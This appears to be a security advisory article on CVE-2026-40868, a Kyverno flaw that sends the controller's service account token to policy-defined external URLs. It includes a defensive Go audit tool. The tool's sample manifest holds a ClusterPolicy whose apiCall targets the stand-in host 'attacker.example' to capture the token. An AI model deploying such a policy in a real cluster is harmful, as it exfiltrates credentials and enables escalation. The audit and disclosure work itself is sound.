## Kyverno Security Flaw: CVE-2026-40868 Allows Service Account Token Leak to Attacker-Controlled Endpoints
A critical vulnerability in Kyverno's policy engine can leak the Kyverno controller's service account token to external, potentially malicious servers. The flaw, tracked as CVE-2026-40868, resides in the `apiCall` service-call helper, which automatically injects an `Authorization: Bearer` header carrying Kyverno's own service account token whenever a policy does not set one explicitly. Crucially, because the target URL (`context.apiCall.service.url`) is defined within the policy itself, an attacker who controls a policy can point this authenticated request at their own endpoint and capture the token: a classic confused deputy.

The primary attack vector involves an adversary creating or updating a ClusterPolicy, or creating a GlobalContextEntry, that specifies a malicious URL. While namespaced policies are blocked from using this feature by a `urlPath` gate, ClusterPolicies and global contexts are fully exposed. This creates a significant risk in real-world GitOps deployments: if the repository or controller managing these policies is compromised, the policy definitions become untrusted input, turning Kyverno's automation into a tool for credential exfiltration.
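To make the two paragraphs above concrete, the following Go program audits exported Kyverno objects for the condition they describe: an `apiCall.service.url` that leaves the cluster while the policy sets no `Authorization` header of its own, so the controller's token would be used. It is an added example written for this page, not Kyverno's own code or its fix. It assumes the field layout `apiCall.service.url` and `apiCall.service.headers[{key,value}]`; the sample manifest, object names, the `kyverno.io` apiVersion strings and the `attacker.example` / `feed.example` hosts are constructed for the demonstration, and the in-cluster allow-list (only `*.svc` Service DNS names) is a deliberately narrow assumption rather than a Kyverno rule.

```go
// Added example (not Kyverno code): flag apiCall.service.url targets in Kyverno manifests
// that would receive the controller's auto-injected Bearer token (CVE-2026-40868 shape).
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/url"
	"os"
	"strings"
)

type Finding struct {
	Kind, Name, Path, URL string
	External              bool // host is not an in-cluster Service DNS name
	AuthSet               bool // policy supplies its own Authorization header
}

// LeaksControllerToken is the vulnerable condition: the request leaves the cluster
// and no explicit header prevents the fallback to Kyverno's own token.
func LeaksControllerToken(f Finding) bool { return f.External && !f.AuthSet }

// isInCluster is a narrow allow-list (example assumption): bare IPs and public hosts count as external.
func isInCluster(host string) bool {
	h := strings.ToLower(host)
	return h == "kubernetes.default.svc" || strings.HasSuffix(h, ".svc") ||
		strings.HasSuffix(h, ".svc.cluster.local")
}

func hasAuthHeader(svc map[string]interface{}) bool {
	hdrs, _ := svc["headers"].([]interface{}) // assumed schema: [{key,value}]
	for _, h := range hdrs {
		m, _ := h.(map[string]interface{})
		if k, _ := m["key"].(string); strings.EqualFold(k, "Authorization") { return true }
	}
	return false
}

// walk visits every map carrying an "apiCall" key, so rule contexts, foreach contexts
// and GlobalContextEntry.spec are all covered without hard-coding a schema.
func walk(v interface{}, path string, visit func(string, map[string]interface{})) {
	switch t := v.(type) {
	case map[string]interface{}:
		if ac, ok := t["apiCall"].(map[string]interface{}); ok { visit(path+".apiCall", ac) }
		for k, c := range t {
			walk(c, path+"."+k, visit)
		}
	case []interface{}:
		for i, c := range t {
			walk(c, fmt.Sprintf("%s[%d]", path, i), visit)
		}
	}
}

// Audit accepts a single object or a kubectl "List" (output of kubectl get ... -o json).
func Audit(manifest []byte) ([]Finding, error) {
	var doc map[string]interface{}
	if err := json.Unmarshal(manifest, &doc); err != nil {
		return nil, err
	}
	items, _ := doc["items"].([]interface{})
	if items == nil {
		items = []interface{}{doc}
	}
	var out []Finding
	for _, it := range items {
		obj, _ := it.(map[string]interface{})
		meta, _ := obj["metadata"].(map[string]interface{})
		kind, _ := obj["kind"].(string)
		name, _ := meta["name"].(string)
		walk(obj, "$", func(p string, ac map[string]interface{}) {
			svc, _ := ac["service"].(map[string]interface{})
			raw, _ := svc["url"].(string)
			if raw == "" { return } // urlPath-only calls go to the API server, not a service URL
			u, err := url.Parse(raw)
			f := Finding{Kind: kind, Name: name, Path: p, URL: raw, AuthSet: hasAuthHeader(svc)}
			f.External = err != nil || !isInCluster(u.Hostname())
			out = append(out, f)
		})
	}
	return out, nil
}

// sampleManifest is constructed for this example; apiVersions and hosts are illustrative.
const sampleManifest = `{"kind":"List","items":[
 {"apiVersion":"kyverno.io/v1","kind":"ClusterPolicy","metadata":{"name":"exfil-demo"},
  "spec":{"rules":[
   {"name":"malicious","context":[{"name":"leak","apiCall":{"method":"GET",
     "service":{"url":"https://attacker.example/collect"}}}]},
   {"name":"internal","context":[{"name":"ok","apiCall":{"method":"GET",
     "service":{"url":"https://policy-svc.platform.svc:8443/check"}}}]}]}},
 {"apiVersion":"kyverno.io/v2alpha1","kind":"GlobalContextEntry","metadata":{"name":"feed"},
  "spec":{"apiCall":{"refreshInterval":"1m","service":{"url":"https://feed.example/api",
   "headers":[{"key":"Authorization","value":"Bearer explicit-token"}]}}}}]}`

func main() {
	in := []byte(sampleManifest)
	if len(os.Args) > 1 && os.Args[1] == "-" { in, _ = io.ReadAll(os.Stdin) }
	fs, err := Audit(in)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(2)
	}
	for _, f := range fs {
		fmt.Printf("leak=%-5t %s/%s %s -> %s\n", LeaksControllerToken(f), f.Kind, f.Name, f.Path, f.URL)
	}
}
```

Run it with no arguments to audit the embedded sample, or pipe a live export through it (`kubectl get clusterpolicies,globalcontextentries -o json | go run . -`). On the sample it reports the `attacker.example` call as a token leak, the `.svc` call as in-cluster, and the `feed.example` entry as external but carrying its own header; the last case still deserves review, because the explicit value may itself be a secret that is now in a policy. Any finding with `leak=true` in a cluster where policy definitions come from Git is the confused-deputy path the advisory describes.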

The implications are severe for any cluster relying on Kyverno for policy enforcement. The leaked service account token, which carries the permissions of the Kyverno controller, could grant an attacker broad access to cluster resources, enabling further escalation. This vulnerability underscores the inherent danger in systems where security-critical automation can be directed by externally controllable configuration, placing immense trust in the integrity of the policy supply chain.
---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: CVE-2026-40868, Kubernetes, Security Vulnerability, Supply Chain Attack, GitOps
- **Credibility**: unverified
- **Published**: 2026-04-17 09:22:43
- **ID**: 69133
- **URL**: https://whisperx.ai/en/intel/69133